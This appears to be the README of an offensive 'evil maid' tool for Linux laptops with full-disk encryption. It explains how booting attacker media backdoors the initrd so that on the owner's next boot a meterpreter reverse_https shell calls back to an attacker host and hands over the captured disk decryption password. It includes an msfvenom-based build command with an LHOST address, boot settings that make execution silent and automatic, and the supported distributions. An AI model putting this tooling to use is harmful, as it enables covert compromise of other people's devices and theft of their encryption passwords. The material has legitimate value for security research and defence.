Scenario
- Laptop left turned off with FDE turned on
- Attacker boots from USB/CD/Network
- Script executes and backdoors initrd
- User returns to laptop, boots as normal
- Backdoored initrd loads:
- (Debian/Ubuntu/Kali)
.sofile into/sbin/initon boot, dropping a shell - (Fedora/CentOS)
LD_PRELOAD.sointoDefaultEnviroment, loaded globally, dropping a shell.
- (Debian/Ubuntu/Kali)
Supported Distros
- Ubuntu 14.04.3
- Debian 8.2.0
- Kali 2.0
- Fedora 23
- CentOS 7
Current Features
python/meterpreter/reverse_httpsto compile time LHOST- FDE decryption password stored in meterpreter environment (
getenv PASSWORD)
Details
Compiling
See the
Makefile for more information/configuration, LHOST is required in the environment to build the .so as msfvenom is piped in at compile time. It is also necessary to have libcrypsetup-dev (or equivalent) installed on the build machine.Generic Instructions (builds iso image in cwd):
LHOST=192.168.56.101 make rev.so isoisolinux.cfg
The following options have been appended to the kernel boot:
mc superuser nodhcp quiet loglevel=0Furthermore, the
prompt value has been set to 0 to allow fully automated execution.Timing
Approximate nefarious boot -> backdoored time: ~2 minutes Approximate legit boot -> shell ~90 seconds (configurable, we want networking up before us)
Prerequisites
core.d is an unpacked core.gz from TinyCore with the below packages merged in.Core-current is an unpacked Core-current.isoThe following packages have been installed inside tinycore (python, filesystem support):
- bzip2-lib.tcz
- filesystems-3.16.6-tinycore.tcz
- gdbm.tcz
- libffi.tcz
- mtd-3.16.6-tinycore.tcz
- ncurses.tcz
- openssl.tcz
- python.tcz
- readline.tcz
- sqlite3.tcz